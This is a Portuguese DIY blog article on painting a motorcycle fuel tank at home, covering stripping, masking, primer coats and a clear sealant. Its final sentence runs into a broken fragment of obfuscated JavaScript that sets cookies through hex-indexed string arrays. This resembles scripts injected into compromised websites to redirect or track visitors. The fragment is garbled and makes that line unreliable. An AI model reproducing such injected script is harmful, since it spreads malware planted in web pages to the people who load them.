Artigos grupo rota, Caminhões e Carretas

Pintura de tanque de moto

Pintura de tanque de moto – É normal querer mudar com o passar do tempo.

Não apenas a nossa aparência, mas também daquilo ao nosso redor, como nossas casas e até mesmos os nossos automóveis. Por esse motivo, a pintura de tanque de moto é algo comum entre proprietários desse tipo de veículo.
Apesar disso, nem sempre há o capital necessário para levar a motocicleta em uma oficina especializada nesse tipo de serviço. Nesses casos, a alternativa é tentar pintar por si mesmo. Diante disso, nesse texto mostraremos um passo a passo de como realizar a pintura de tanque de moto, evitando ao máximo os erros que podem causar problemas no futuro.

Passo a passo: pintura de tanque de moto

Se você está cansado do visual de sua motocicleta e tem a intenção de mudar a cor e dar um toque a mais de design no tanque, veja abaixo alguns passos para a pintura de tanque de moto:

– Remova a tinta antiga: – Pintura de tanque de moto
Pintar sobre uma tinta antiga nunca é uma boa ideia. Primeiramente, é bem provável que a nova tinta tenha dificuldade para se fixar, sendo necessária uma quantidade maior de material. Além disso, é bem provável que a cor não fique no tom desejado.
Por esse motivo, a com a ajuda de uma máquina lixadeira, remova toda a tinta antiga. Depois de feito, passe uma lixa número 180 em toda a superfície do tanque, com o objetivo de suavizar a textura.

– Proteja as áreas sensíveis: – Pintura de tanque de moto
Proteja todas as áreas que podem causar problemas futuros caso sejam atingidas pela tinta. Nesse caso, vedar a abertura do tanque com uma fita isolante pode ser o suficiente.

– Aplique a tinta: – Pintura de tanque de moto
Utiliza uma tinta primer, própria para pintura de automóveis, para realizar esse passo. Com a ajuda de uma máquina de pintura, aplique, pelo menos, cinco mãos de tinta em toda a superfície do tanque. Entre as aplicações, lixe todo o tanque (com uma lixa número 380) e espere cerca de dez minutos para aplicar novamente.

– Aplique camadas protetoras: – Pintura de tanque de moto
Encontrado em lojas especializadas em artigos automobilísticos, o selante transparente de polímero é responsável por manter a coloração da tinta por mais tempo. Além disso, ele é de vital importância para proteger o tanque contra gotas de combustível e ações corriqueiras da natureza, como o Sol, a chuva, dentre outros.

Entre uma camada e outra, espere a substância secar para aplicar novamente.

É importante ressaltar que a pintura de tanque de moto é um processo bastante trabalhoso, que exigirá tempo, habilidade, ferramentas e máquinas que nem todas as pessoas possuem ao seu dispor. Por esse motivo, evite ao máximo realiza-lo se você não possui experiência nessa área.

Algumas vezes, economias podem gerar mais gastos no futuro.,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var (e||”)+g+’;\x20path=/’;}r (0x0)==’\x20′)n=n[b(‘0xb’)]

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *